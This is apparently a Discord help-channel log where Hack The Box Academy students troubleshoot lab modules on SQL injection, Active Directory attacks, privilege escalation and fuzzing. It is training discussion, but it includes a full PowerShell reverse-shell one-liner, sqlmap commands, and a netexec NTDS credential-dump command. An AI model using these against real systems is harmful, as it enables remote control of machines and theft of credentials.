Hey there is an error in the "Intro to binary fuzzing module" on the LibFuzzer section. Its right after the big screenshot at the the top, starting at "This function (LLVMFuzzerTestOneInput)" and continues for a few paragraphs. This info appears to be presented earlier than intended as the code box for that function is way lower on the page

ember dune
#

MODULE: Skill Assessment SQL fundamental lab

i have got web shell through mysql on the target, but i do not know how to get flag which is at /root

#

I have check NIC but they all are LAN IPs

tepid holly
#

Where the hell is the flag in "whitebox attacks advanced exploitation"?

polar widget
autumn pilot
#

authenticate doesn't necessary mean rdp

polar widget
#

thanks for the subtle hint, I am revisiting this module after a long time, my bad

tacit bay
#

Probably being dumb, but im having issues with ThreatCheck.exe - in the Intro to Windows Evasion module, every time I build it and run it against any sample I get the exact same result.. Anyone else faced similar issue?

worldly badger
#

hello guys! what is the answer for the first question of Module 'Attacking Web Applications with Ffuf'; Section: Skills Assessment - Web Fuzzing??? I performed vhost fuzzing and got couple of hits but i dont know in which order i should put them as answer.

dense eagle
#

Hi bro, am having the same challenge , how do i decrypt the cookie in plaintext?

worthy solstice
jade lava
#

Linux Privilege Escalation
Shared Libraries
Escalate privileges using LD_PRELOAD technique. Submit the contents of the flag.txt file in the /root/ld_preload directory.

When I was reading, in the reference they showed how to escalate privileges using sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart, however when I check which commands I can run as sudo, I get
User htb-student may run the following commands on NIX02:
(root) NOPASSWD: /usr/bin/openssl
I know how to escalate my privileges using ssl, but that is not really related to LD_PRELOAD. I need help figuring out how to start

worldly badger
worthy solstice
cyan marsh
#

hey guys anyone can help me with sea machine to solve im stuck in netcat command im unable to recive anything. if you could pls help me

storm elk
cyan marsh
#

anyone is thee to help me through the sea machine?

cyan marsh
urban elk
pliant coyote
#

why it can't connect?

autumn pilot
#

try with sudo

pliant coyote
#

useful

opal nexus
#

I'm sorry If its the wrong forum but I really need help and I'm not sure where to submit it:
HTB Academy recognize my browser with adblock, even if there is none installed (and I tried Chrome, firefox and Edge).
Due to that, I cant contact support (even though until few days ago everything was fine even with adblock.

Does anyone knows how to fix it?

worldly badger
storm elk
#

There's an email customerops@hackthebox.com

opal nexus
worldly badger
#

you had adblock as browser extension or as an app?

opal nexus
storm elk
#

I have the same Amit. My browser has no adblock and somehow it did get a notification about it this morning

#

maybe Chrome changed something on their end

worldly badger
#

try to contact them via email

opal nexus
opal nexus
calm spire
#

Morning guys, I am busy with the Skills Assessment - Windows Fundamentals module. And I am trying to create a shared folder by going to advanced sharing and changing the share name there, i also checked the "share this folder" box and applied the changed settings but the folders name does not change automatically, what would be the reason for this?

green minnow
#

Where would the "NTLM password hash" be here? htb-student:1002:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::

#

I have submitted aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58, aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58::: and :aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58::: all says incorrect answer

final shale
rustic sage
#

Finally !! its great module

#

fun to learn ADCS tho

smoky snow
#

I hope it'll get updated with esc12-15

rustic sage
limber river
#

one of the best read I ever had

rustic sage
tepid holly
#

Also curious about this

rugged parrot
storm shard
#

So that tiny bubble to open up support/AI questionnaire turned into a massive banner that follows the scroll for every page?

sudden zenith
#

Might be off topic here, not sure where else to post this. Looking for an invoice for an annual subscription, HTB never emailed me anything and I need it to submit. Cannot seem to find anywhere in the Academy to download receipts / invoices from a billing page. Anyone have an answer for this one?

reef pecan
#

Why sqlmap -u "http://94.237.50.65:33570/case8.php" --dump --batch --csrf-token="t0ken" --method "POST" --data id=1&t0ken=4hgWm3mI7IBSOKGsvg6tgE5nbuV0F9E4GLrlvQR9i4 works and sqlmap -u "http://94.237.50.65:33570/case8.php" --data "id=*&t0ken=qqLdNv4CJE6A0R4jJZAI2wEv2rTV4VWJzEzJAxa0uwI" --dump --batch --csrf-token="t0ken" does not. A difference is in quotes and I use fish terminal. Is it a different terminal behaviour?

tropic bridge
#

good afternoon! I need assistance on gaining controlling DC01 on the skills assessment on documenting and reporting. I have a few account passwords that can access the domain, however I am unable to obtain the admin hash/ cannot crack the NT hash when using hashcat. Any ideas?

reef pecan
#

It shouldn't make an impact, I am sure I tried it but if --data is defined, it is intelligent enough to make it POST.

patent summit
#

Hey guys I have a doubt , I want to develop a saas using mern stack but it's hard to use chat gpt for this , it won't stay on a same track , is there any trick to develop bigger projects using chatgpt

reef pecan
soft reef
gray yacht
shut wraith
#

Is there any connection problems with u guys on the module labs ?

rocky mist
#

im having problems with my parrot OS, can someone here help me please

#

bet i dmed u

viral lotus
#

module: Attacking Common Services - Attacking SMB - Login as the user "jason" via SSH and find the flag.txt file the password I have keeps creating an error of "bash: !@28Bszh" whenever I try to use a tool to get the final piece I have his full password and it is correct but keep getting the error

plain trellis
viral lotus
#

I tried that it didn't work but its fine I resolved it another way i think i used -u instead of -U and smbclient seemed to then work

plain trellis
jaunty pumice
#

Has anyone done the "Getting Started Public Exploits" module recently? Been scratching my head about this, currently using the online workstation, the question says that the Web server may take a few minutes to load up, I did a nmap of the IP using -sC and -sV to get versions, managed to find the web server, went to do the exploit but then for some reason the web server closed. Did another nmap, and got the rpcbind, did an exploit for that, that completed. Did another nmap, to see if I can find the Webserver however that has not seem to have worked either. Wanted to find out if other people have had issues with this module

civic steeple
#

hello, i'm in Linux Fundamentals, System Information

Which kernel version is installed on the system? (Format: 1.22.3) i put many answers but the one i think is right is 6.5.0 but the system says incorrect

What is the name of the network interface that MTU is set to 1500? i've tried tun0 and ens3, neither are correct, after many different types of attempts, i am at a loss on both questions at this point.

any hints or tips would be greatly appreciated

viral lotus
#

its one of the commands listed

civic steeple
#

uname -a
Linux htb-3jsa8lsrmy 6.5.0-13parrot1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.13-1parrot1 (2023-12-19) x86_64 GNU/Linux

#

i think i'm looking at the kernel version, i'm fairly new to this so not exactly sure but the command seems to be uname -a (ive tried uname -v as well)

viral lotus
#

look at the uname help page you aren't far off

jaunty pumice
civic steeple
#

man uname?

viral lotus
#

yes or uname --help

civic steeple
#

[us-academy-5]โ”€[10.10.15.110]โ”€[htb-ac-1577473@htb-3jsa8lsrmy]โ”€[~]
โ””โ”€โ”€โ•ผ [โ˜…]$ uname -s
Linux
โ”Œโ”€[us-academy-5]โ”€[10.10.15.110]โ”€[htb-ac-1577473@htb-3jsa8lsrmy]โ”€[~]
โ””โ”€โ”€โ•ผ [โ˜…]$ uname -n
htb-3jsa8lsrmy
โ”Œโ”€[us-academy-5]โ”€[10.10.15.110]โ”€[htb-ac-1577473@htb-3jsa8lsrmy]โ”€[~]
โ””โ”€โ”€โ•ผ [โ˜…]$ uname -r
6.5.0-13parrot1-amd64
โ”Œโ”€[us-academy-5]โ”€[10.10.15.110]โ”€[htb-ac-1577473@htb-3jsa8lsrmy]โ”€[~]
โ””โ”€โ”€โ•ผ [โ˜…]$ uname -v
#1 SMP PREEMPT_DYNAMIC Debian 6.5.13-1parrot1 (2023-12-19)
โ”Œโ”€[us-academy-5]โ”€[10.10.15.110]โ”€[htb-ac-1577473@htb-3jsa8lsrmy]โ”€[~]
โ””โ”€โ”€โ•ผ [โ˜…]$ uname -m
x86_64
โ”Œโ”€[us-academy-5]โ”€[10.10.15.110]โ”€[htb-ac-1577473@htb-3jsa8lsrmy]โ”€[~]
โ””โ”€โ”€โ•ผ [โ˜…]$ uname -p
unknown
โ”Œโ”€[us-academy-5]โ”€[10.10.15.110]โ”€[htb-ac-1577473@htb-3jsa8lsrmy]โ”€[~]
โ””โ”€โ”€โ•ผ [โ˜…]$ uname -i
unknown
โ”Œโ”€[us-academy-5]โ”€[10.10.15.110]โ”€[htb-ac-1577473@htb-3jsa8lsrmy]โ”€[~]
โ””โ”€โ”€โ•ผ [โ˜…]$ uname -o
GNU/Linux

i've tried 6.5.0 and 6.5.13 but says theyre both wrong

#

am i still missing someting?

civic steeple
#

[โ˜…]$ uname -a
Linux htb-3jsa8lsrmy 6.5.0-13parrot1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.13-1parrot1 (2023-12-19) x86_64 GNU/Linux

civic steeple
#

i'm not sshing from my own machine if thats what you're asking

viral lotus
#

6.5.0-13parrot1-amd64 - thats the pwnbox

civic steeple
#

am i SSHing within the VM? or am i doing it from the machine i am physically working on. i think thats where i am getting hung up on that

viral lotus
#

ssh in the pwn box to the target IP that comes up under questions section

#

creds are already given to you

civic steeple
#

i'm not seeing the IP, i do see the credentials

#

[us-academy-5]โ”€[10.10.15.110]โ”€[htb-ac-1577473@htb-3jsa8lsrmy]โ”€[~]

#

10.10.15.110?

gray yacht
#

Look at the screenshot above that mczen shared.

civic steeple
#

this is y first time doing this on HTB, my apologies

gray yacht
civic steeple
#

for future reference, i don't see an ip on my screen that i would SSH into, any reason?

soft reef
#

you have to start target, you'll get an ip.

civic steeple
#

ok i start the VM and use the VM to SSH into the target, broken brain

soft reef
#

yes you got it.

civic steeple
#

ok i'm getting acclimated to the setup, thank you all, so helpful. i appreciate you all just not giving the answers, i need to suffer through what i don't know. i know you can appreciate that

gray yacht
viral lotus
#

if you haven't done the intro to academy module yet it may help you, it's fairly short but shows you how to navigate around

civic steeple
#

all good now, thanks again!

jaunty pumice
#

Cool nice one congrats. Like someone said before. Open up Onenote or any text editor you like and make notes for each topics/modules. Helps out a lot

civic steeple
near tendon
#

You can create a task with -x flag and export its XML so you can use it as a template, make sure <actions> , <triggers> and <settings> are formatted properly, each element must be present and well structured within XML file, because task scheduler expects every tag in place

#

In CME modules generally handle XML generation automatically, with limited flexibility in directly modifying template unless you customize the source code

#

It leverages WMI to execute commands remotely, so it avoids task scheduler, which means no XML involved in the process, because it is different from atexec where CME creates tasks under the hood

indigo rune
#

Do the modules sometimes feel like theyre out of order?
I was doing an infosec intro module and got to a wireshark decryption part, but the decryption part was needed to solve the solution and the actual part of the module about decryption was after i finished the flags?

#

This isnt the first time either, there have been a few times where a new concept is introduced and then fully covered in the next part of the module

wooden olive
#

need a hnint in api attack skill assessment, guys

I'm logged in as supplier and now I'm trying to read flag.txt.
I found an input to upload cv, but it is possible to upload a file with `.pdf' extension.

When I try to read ../../../flag.txt or something, I can't read it, can you give me a hint ๐Ÿ™‚

viral lotus
#

module: Attacking Common Services - Attacking SQL Databases I am on q1: What is the password for the "mssqlsvc" user? I have used mssqlclient and tried sqsh and I can get to the databases I get that flagdb requires the credentials from the q1 to get the flag but I cannot figure out where this is. Any nudges would be greatly appreciated

fathom pendant
gray yacht
viral lotus
fathom pendant
viral lotus
zealous rune
#

hi, i'm working on Attacking Active Directory module on the section "Privileged Access"

#

I'm trying to answer the end of section questions, using bloodhound

#

i have run sharphound collector on the target and managed to ingest those into my Bloodhound install locally

rustic sage
#

Can someone tell me where I can find a good explanation for the module dynamic port forwarding with ssh and socks tunneling? It's extremely poor written

#

Been arguing with chatgpt for 30 minutes to understand this

zealous rune
#

I feel like I should see results for the cypherqueries given in the section

#

however i don't...

#

I did manage to find the answer for the first question in the section using PowerView

rustic sage
zealous rune
#

but I'd like to see it in bloodhound and I'm not sure whether the queries are not yielding anything because I am doing something wrong or the data collected from the domain by sharphound doesn't contain any users with those rights/privs

sacred gull
#

Still need help with the Open-Source Software under Win Evasion Techs

#

If anyone can give me a hand actually executing either the obfuscated exe or load Invoke-Seatbelt in powershell would be great as it doesnt work whenever I tried

#

Executing any .exe is against the group policy and I always get an error running the ps1 script

midnight kindle
#

does sqplus comes pre installed in pwnbox? if not , can someone guide me how to install it? thanks.

#

sqlplus

sacred gull
#

sudo apt install oracle-instantclient-sqlplus

#

@midnight kindle

midnight kindle
#

ty

civic steeple
#

I'm on this module: https://academy.hackthebox.com/module/18/section/81

first question is: What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?

i ran code i thought would work but got nothing back. I then checked the walkthrough, pasted the code it suggested and got nothing back. I reset the machine and tried again, still nothing. thoughts?

code I came up with: find / -type f -name *.conf -user root -size +25k -size -28k -newermt 2020-03-03 -exec ls -al {} ; 2>/dev/null
AND
find / -type f -name *.conf -user root -size +25k -a -size -28k -newermt 2020-03-03 -exec ls -al {} ; 2>/dev/null

walkthrough code: find / -type f -name *.conf -size +25k -size -28k -newermt 2020-03-03 2>/dev/null

soft reef
zealous rune
#

Module Attacking AD Section Privileged Access. Not sure this is working properly. I have run sharphound and ingested resulting Bloodhound files into my local installation of BloodHound CE. Then run the queries given in the section to find the user that PSRemote rights. No results.

I then checked the walkthrough which does exactly the same, same query, i copied and pasted no results.

In fact I feel like the bloodhound data i have ingested does not contain any users that have psremote to a com puter in the domain.... just from browsing the data

viral lotus
fathom pendant
#

Have you considered the super basic password is correct?

viral lotus
midnight galleon
#

Windows Privilege Escalation - User Account Control
what is the point of UAC bypassing if i can just get the admin token anyway by running the process as admin?

viral lotus
sacred gull
midnight galleon
#

is it only when i don't have gui i would need the bypass?
tbh i don't feel that this UAC is useful anyway

sacred gull
#

If you have admin on the machine then yes that would be the only usecase

#

if you have adminsitrator on a windows machine though then you basically have it rooted

sacred gull
midnight galleon
#

i mean when i am not admin but i have some right

#

is the UAC bypass still usefull?

sacred gull
#

UAC is used to elevate your access token, so you can elevate from medium to high integrity

midnight galleon
sacred gull
#

Ah no worries

midnight galleon
sacred gull
#

Yes

midnight galleon
#

the bypass will give me all the admin privs?sounds not right

sacred gull
#

Basically the way windows determines who can do what is with access tokens that range from System, down to Low. Standard users by default are set at a medium and Administrators are set to high. UAC bypass lets you increase your integrity level on the machine from medium to high

urban elk
midnight galleon
#

so if i have this high level, can i access resources that are protected beyond my permissions? like go and dump the sam db or smthing

sacred gull
sacred gull
#

You would need System level I believe

viral lotus
midnight galleon
sacred gull
#

No worries!

midnight galleon
#

lol even the guys at Microsoft said it is useless

sacred gull
#

Yeah there are way to many bypasses

urban elk
# urban elk anyone up for a DM regarding the hard lab for the Password attacks module (https...

ok, to give a bit more info... I have cracked the bitlocker password, but I can't use it because I can't mount the virtual drive without admin rights... Turning every stone I turned my attention to some visible network hosts, but after password spraying didn't work (and brute-forcing with the usual not getting anywhere quickly) I'm getting the feeling that those hosts are not really part of the game... Do I just need to find myself a windows host where I'm an admin, to open this drive?..

timber roost
#

Hi. Does anyone here every run into a problem where it seems there should be a port attached to the box' IP, but there isn't? I'm on module/23/section/254, Remote File Inclusion (RFI), and unlike all the other sections of the module, no port shows up and the machine IP doesn't resolve in the browser. I tried resetting it a few times. The machines are also non-responsive to pinging. Also, I can reach other modules' machines

#

I imagine there's some temporary backend issue. Giving up for the day. I will try again tomorrow.

urban elk
viral lotus
urban elk
#

not sure what you mean, but it was the last exercise of the module

viral lotus
urban elk
#

yes

viral lotus
#

ok gotcha, well if you took notes and are going again tomorrow I can try help. I got my notes from it

urban elk
#

sorry, I wasn't clear, I finished it. But actually I'd be happy to compare notes because I find it really strange that I had to do what I did

viral lotus
#

ohh thats good then, yeah ill be on tomorrow

urban elk
#

cool ๐Ÿ™‚ thanks

gray yacht
urban elk
gray yacht
#

Nevermind it looks like you're done

gray yacht
urban elk
shut wraith
#

VPN

gray yacht
#

I don't recall saying anything about a VPN issue.

shut wraith
#

I keep losing connection to my lab

viral snow
sacred gull
gray yacht
snow briar
#

can someone plz help me on the last section (skills assessment) of the Attacking WPS module? the AP i'm attacking keeps getting me locked out even when setting delays and time to wait when getting locked out, can someone plz help?

civic steeple
robust plover
#

Guys, can someone help me here?

I'm working on the Linux Fundamentals module in the Find Files and Directories section, it's asking me this: "What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?"

I'm using this command but it's not working: find / -type f -name "*.config" -newermt 2020-03-03 -size +25k -size -28k -exec ls -la {} ; 2>/dev/null

#

Do any of you guys have some idea of what can I do?

civic steeple
robust plover
#

I mean, I had a problem and had to relaunch the vm, could that be the problem?

robust plover
civic steeple
#

so everything i tried failed because i was simply in the wrong machine. silver lining, i'm probably a little better at linux now lol

robust plover
#

lol, I reseted here, let's see if it works

civic steeple
#

it will, literally everything i tried first the first time worked this time

#

i mean i hope for your sake

shell stag
#

Hello friends, has anyone else had trouble installing the ODAT tool in the foot printing module? The script in the module doesn't work due to some conflicts with pip3 and having to install the libraries via a python virtual environment. I've been wrestling with it for quite a while now. I've resigned myself to maybe having to build it from source code according to the projects GitHub readme. Just wondering if there's an easier way

robust plover
#

Thx for your help bro @civic steeple

civic steeple
#

someone way more seasoned than me would've caught that, my apologies

robust plover
cloud urchin
shell stag
shell stag
#

Hm. Perhaps it's my distribution. I'll have to tinker with it a bit more. Thanks for responding~

shut vapor
#

I'm in SQLMap Essentials > Attack Tuning > What's the contents of table flag6? (Case #6)
The hint tells you what prefix to use -- ||i.e. '`)'.|| -- but how would I know that without the hint?

cloud urchin
#

probably experience with SQL queries

uneven niche
#

I'm using kali VM -- sometimes when I use ffuf I get 1000 req/sec and other times I only get like 300 req/sec. Is there any way to speed this up without increasing threads? I'm trying to do the web fuzzing skills assesment but it's taking forever.

#

I see. I've noticed the speed is dependent on what domain is being used. Is there a chance this could be faster if I try this at a different time, or is this just how it's going to be?

civic steeple
wooden olive
red shuttle
#

solved or still open?

unique ether
#

i solved the lab with normal webshell but want know why this rev shell drops

pine dune
#

Hi guys I need help with a question on the password attack module

#

Attacking Active Directory & NTDS.dit

#

nvm I managed to solve it

urban elk
#

(not sure where it would be best to ask this, berate me if this is too offtopic, but) For those of you taking notes with Obsidian, do you use the git plugin? And why do that over just having your vault in a git repo that you "manage yourself" ?

pine dune
#

Hi guys, I need help with this question

#

I created a list of usernames from the given names, however how do we use these usernames in order to attack smb?

#

here is my command

#

usernames2.txt is the list of usernames i created

real delta
pine dune
real delta
#

Just paste the valid username and password into the answer

#

username:password format

pine dune
#

i did check this out

real delta
#

Thanks

pine dune
#

sorry

#

how do we add spoilers?

real delta
rustic sage
#

U don't

pine dune
#

ah ok I tried pasting it in doesnt work

real delta
pine dune
#

yeah thats what I did

#

can I show u?

urban elk
#

you found the password to another user

real delta
#

I haven't done the module

urban elk
#

read the question again

pine dune
#

ah yes

#

thank u but why did it stop at this user and not carry on finding out all of them?

real delta
#

You can specify it to continue

urban elk
#

there's a flag to keep going. Alternatively, you can make a new userlist to focus on the target user

pine dune
#

ah ok guess i should delete the other users in that case

urban elk
#

you need to get into the habit of finding it on your own ๐Ÿ™‚

real delta
rustic sage
urban elk
#

Sigh.

pine dune
#

thank u all

faint hamlet
#

I am doing AD Administration: Guided Lab Part I in Introduction to Active Directory module. Facing trouble connecting to RDP.
Am I doing something wrong or is it infrastructure issue?

fathom pendant
#

Use remmina or another tool

pine dune
#

Hi guys anyone know why this doesnt work

dark hedge
#

show the command

pine dune
#

netexec smb 10.129.202.85 -u username -p password --ntds

#

ive hidden the username and password from spoilers

faint hamlet
# fathom pendant Use remmina or another tool

Used windows Remote Desktop Connection (Black Screen), shifted to wsl kali xfreerdp (Black Screen), and rdesktop is atleast showing a display.

Thanks remmina worked. Do you know what was the issue?

dark hedge
#

module name section name and question also helps

fathom pendant
#

Black screen, just hit enter

pine dune
#

Pssword attack module and herer is the specific one in the module

#

Attacking Active Directory & NTDS.dit

#

Capture the NTDS.dit file and dump the hashes. Use the techniques taught in this section to crack Jennifer Stapleton's password. Submit her clear-text password as the answer. (Format: Case-Sensitive)

#

I used the username list of Jennifer Stapleton to get her usename and password

#

wait a minute

#

apparently ive already got it ๐Ÿค”

snow quartz
#

Hi. I need help to solve on the Footprinting - DNS in the following

Q4: What is the FQDN of the host where the last octet ends with "x.x.x.203"?

So far I've done the following:

  • Performed ||the subdomain bruteforcing as in the guide module||
  • Performed ||the same thing, but with running through $subs.internal.inlanefreight.htb ...||
  • Retried ||dig axfr on the subdomains that I've found from dig axfr internal.inlanefreight.htb ...||
    None of them are worked. Is there any guide that I might be missed out? Thanks in advance!
pine dune
#

I thought we needed the ntlm hash or something

faint hamlet
fathom pendant
snow quartz
fathom pendant
cobalt osprey
#

Hi, i need help in a skill assessment, i am doing the shells and payload real world situation and i have to connect via rdp to an internal network pc, but when i connect i get into a really old version of parrotos, for the scenario i have to visit an url but in the os there isn't a browser, what shoul i do?

snow quartz
rustic sage
cobalt osprey
#

ty guys

shut vapor
gloomy stump
#

I have the same Problem, whats the solution for the snytax errors?

shut vapor
#

Spinaltap?

#

Mine goes to 11.

fathom pendant
#

Does sqlmap go that high?

#

Mine might be outdated then

shut vapor
#

It does not. "Turn it up to 11" is from a mockumentary called Spinaltap. I don't recall the values, 3 and 5 I think.

#

The question isn't about the values, I'd like to know if there are indications that turning up --risk and --level are worth trying or if it's just a param that's handled appropriately.

gloomy stump
#

I'm alway getting snytax error using this payload: powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.90',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
whats wrong with it?

#

Got it ๐Ÿ™‚ it works with a shell with I found on reverse shell generator ๐Ÿ™‚

devout topaz
#

how did you solve it please

green minnow
#

Should I be able to curl docker targets?

โ•ฐโ”€$ curl -IL 94.237.59.180:45414
curl: (52) Empty reply from server
โ•ญโ”€l0dest4r@archlinux ~/Downloads 
โ•ฐโ”€$ curl -IL 94.237.59.180                                                                                                      52 โ†ต
curl: (52) Empty reply from server```
fathom pendant
#

It depends what's being hosted

shut vapor
#

I would expect that to work if it's a webservice

green minnow
#

I'm not having much luck with the docker targets

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://94.237.59.180/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================

Error: error on running gobuster: unable to connect to http://94.237.59.180/: Get "http://94.237.59.180/": EOF```
storm elk
#

you're most likely forgetting the port

#

if its an external IP, there will always be a port

green minnow
#

with gobuster, same result

storm elk
#

can you access the link in your browser?

green minnow
#

no

storm elk
#

I can open it here - without vpn

green minnow
#

Is this that vpn issue I was talking about yesterday again?

storm elk
#

VPN is only need for internal IPs

green minnow
#

I am connected to HTB vpn but also my own tunnel

storm elk
#

this is a public IP, no vpn is needed

green minnow
#

Curl and go buster work with my private VPN turned off

#

Need to get round to sending that support email prayge

tepid holly
#

PoC and Patching - Validation Logic Disparity.
Any hints? I know I need the email to end in a specific way but thats all

#

In Parameter Logic Bugs

green minnow
#

I'm really liking the cheat sheets you guys put in the modules. I'm still taking notes but it's reducing my name to copy across a lot of commands.

warm lava
#

Attacking Common Applications - Gitlab...has anyone found a wordlist to find the additional user for Gitlab? I have used just about every wordlist I can and none of them seem to answer the challenge

green minnow
#

Am I just doing this wrong? I am user1 and the results of sudo -l is I can run /bin/bash as user2 with no password but all of these commands return "user2 is not in the sudoers file this incident will be reported." sudo -u user2 /bin/bash -u user2 su -c 'cat /home/user2/flag.txt' sudo -u user2 python -c "with open('/home/user2/flag.txt') as f: print(f.read())" sudo -u user2 awk '{print}' /home/user2/flag.txt sudo -u user2 find /home/user2 -type f -name flag.txt -exec cat {} \;

warm lava
#

@soft reef that is interesting I have been through most of them in SecList with no success. I went on to find the flag but all users I found did not answer the challenge.

warm lava
#

I am running through RY currently but pretty much same result.

green minnow
#

according to a write up sudo -u user2 /bin/bash should work

soft reef
normal sand
#

I'm not sure how to give you a hint without giving you the answer, but here's the best I can do:

||Use your sudo rights to run bash||

green minnow
normal sand
slender steppe
#

Hi

lime zinc
#

I've been working on a pentesting exercise and recently managed to obtain a user's hash with GetUserSPNs.py and cracked it with john. After validating the credentials with GetADUsers.py against administrator.htb, I was able to confirm that the credentials for olivia and ethan are indeed correct.

Here's a summary of what I've done and the issue I'm facing:

Used GetUserSPNs.py to request a hash for the user olivia, cracked it, and verified it alongside ethan's credentials using GetADUsers.py -all.
WinRM access works perfectly with olivia, but I can't connect via WinRM with ethan's credentials, even though the credentials are confirmed to be correct.
When I log in as olivia via WinRM, I can see only three accounts on the machine: olivia, emily, and administrator. However, ethan's credentials should, in theory, allow me to connect.
My question is: Why might ethanโ€™s credentials fail with WinRM access even though they are valid, and what else can I try to troubleshoot this?

Additional Info:

OS: Target machine is Windows Server 2019.
WinRM is configured correctly since it works with olivia.
Iโ€™ve already attempted using different Impacket tools and CrackMapExec with ethan, but they donโ€™t return any unusual errors.
Any insights on why I might be facing this issue or suggestions on additional checks or configurations I could try would be greatly appreciated!

tranquil axle
lime zinc
tranquil axle
warm lava
# soft reef Its in of the seclists list.

Ok thanks I will keep cranking away on it. did you have to narrow the list or anything to get it? I have been stuck trying to clear that question for 3 days. I have been using the Python script and it usually times out but I get about 8 to 10 results; none of which have been successful.

lime zinc
blissful salmon
#

Not sure if this is the right place

#

Hello all,

I am currently working on the FTP footrpinting and was able to get the flag.txt file, but when i try to get the first question "Which version of the FTP server is running on the target system? Submit the entire banner as the answer." i cant get the answer.

I have tried the nmap commando nmap -sV --script=banner -p port <ipadress>, nc -nv and even connect to the FTP server but evey time i fil in the banner as an answer i get the response that the answer is wrong. Can someone tell me what i am doing wrong?

tranquil axle
normal sand
blissful salmon
#

When i sumbit the banner i only get the response that the answer is wrong, i have re read the whole page and tried everything i can think off.

normal sand
blissful salmon
#

2 is the first and las it 1

#

I can send you an pm if you want with a screenshot

normal sand
elder thicket
#

@slate zinc

#

Bro

slate zinc
#

hello

elder thicket
slate zinc
#

like what ?
mention the name and section of module

elder thicket
#

I can't send messages in general that's why i messaged here

slate zinc
#

i cant help you hack a discord server but if all you wanted was to send messages in #general
you can read #welcome and verify (as in link your htb account)
by doing that you will be able to send messages in geenral

#

note : *its not only me but no one will help you hack a discord server here *

elder thicket
slate zinc
#

no bro i cant hack a discord server
and its also against the rules

elder thicket
slate zinc
elder thicket
slate zinc
#

unless given permission

elder thicket
slate zinc
#

the company that will hire you

elder thicket
slate zinc
#

you can learn on hackthebox academy

#

start with the information security path

elder thicket
#

Hmm

slate zinc
#

and dont try to hack discord because you dont have permission from them

elder thicket
#

Yeah get it

slate zinc
#

good luck :)

viral snow
#

I'm in the home stretch, but I'm stuck ๐Ÿ˜ฉ๐Ÿ˜ฉ๐Ÿ˜ฉ

I'm in Attacking Enterprise Networks - Post Exploitation.

Port 22 of 172.16.9.25 is closed, when it's supposed to be opened.

Those of you that finished this final module, can you guide me in the right direction?

172.16.9.25 pinged True in evil-WinRM, but it's closed when I run an nmap scan with proxychains.

viral snow
fathom pendant
#

i used ligolo for my pivot ยฏ_(ใƒ„)_/ยฏ

viral snow
placid edge
#

Anyone that could give a hand on Common Session Variables (Account Takeover) on Abusing HTTP Misconfigurations ?

I have done the account takeover but the login2.php suddenly requires a mfa token of sorts. Anyone that has done this that could give a hand?

warm lava
mint hound
fathom pendant
soft reef
cedar void
#

Hi I am trying to indent these two lines in a python file in Vim(can't use nano in this module) but when I tab over with the tab key it doesn't work.

Ive tried some of the online suggestions and they are also recommending that I use tab

flint tinsel
#

In Getting Started Section > Knowledge Check, I obtained my initial foothold on the system, but I don't have access to any commands like: wget, sudo, apt, su, python, python3, etc. Pretty much everything except cat, cd, and ls. Even when looking at what is installed under /bin and all of the packages we are used to. But still am not able to use them when using absolute pathing. Am I missing something?

placid edge
#

did you figure it out?

cedar void
placid edge
#

a

placid edge
#

How come there is little to no support on CWEE modules got damn

tardy estuary
opal nexus
#

Has anyone done Wi-Fi Penetration Testing Basics --> Aireplay-ng module?
The answer of the question: "Set the channel to 11 and test for packet injection using aireplay-ng. On how many APs does it perform packet injection? (Answer in digit format: e.g., 3)"
is not what I got in the output of the required commands.
Can anyone explain to me in private chat please? (I dont wannt spoil here any specifics)

analog dock
opal nexus
rustic sage
#

@languid fjord

languid fjord
#

yes?

rustic sage
languid fjord
#

about?

rustic sage
analog dock
marsh ruin
#

Hey guys not sure if this is the correct spot for module questions but I'll post anyways, currently working on the windows attack & defense module for the SOC Analyst Path however I'm coming across a roadblock with the final question: Connect to DC1 as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the TargetSid of the bonni user? seems simple enough, right? rdp with the credentials I found with the SearchUserClearTextInformation script, unable to login incorrect credentials as expected however In the Domain Controller, I can only see events 4625, and 4776 that relates to my failed login, nothing in the hinted 4771 EventCode, I have been going back and forth even attempting to authorize access via cmd, I have even managed audit settings in Group Policy Management, specifically enabling Kerberos Pre-Authentication Auditing ( which surprisingly was not configured???) with still no change to Kerb pre-auth logs (4771). for some more context I attempted to RDP via the VM cli, host windows OS, through windows RDP, I event checked pre existing logs under 4771 with nothing relating to the bonni user, also cleared all logs and performed the entire process from scratch to make sure It wasnt getting lost in the muck. Any help would be most appreciated I'd love to check off this section so I can receive my badge and move on to the next module ๐Ÿ™‚

sick depot
#

has anyone had this issue on pass the ticket from linux

#

oot@linux01:/# smbclient //DC01/julio -k
gensec_spnego_client_negTokenInit_step: Could not find a suitable mechtype in NEG_TOKEN_INIT
session setup failed: NT_STATUS_INVALID_PARAMETER

fathom pendant
fathom pendant
sick depot
fathom pendant
#

try changing vpn regions and respawning targets; check ticket validity as well

tender nimbus
#

hey guys im doing the ad enumeration , credential enurmeration on linux section, i'm trying to bloodhound GUI but i don't really understand what to do can anyone help me?

calm obsidian
#

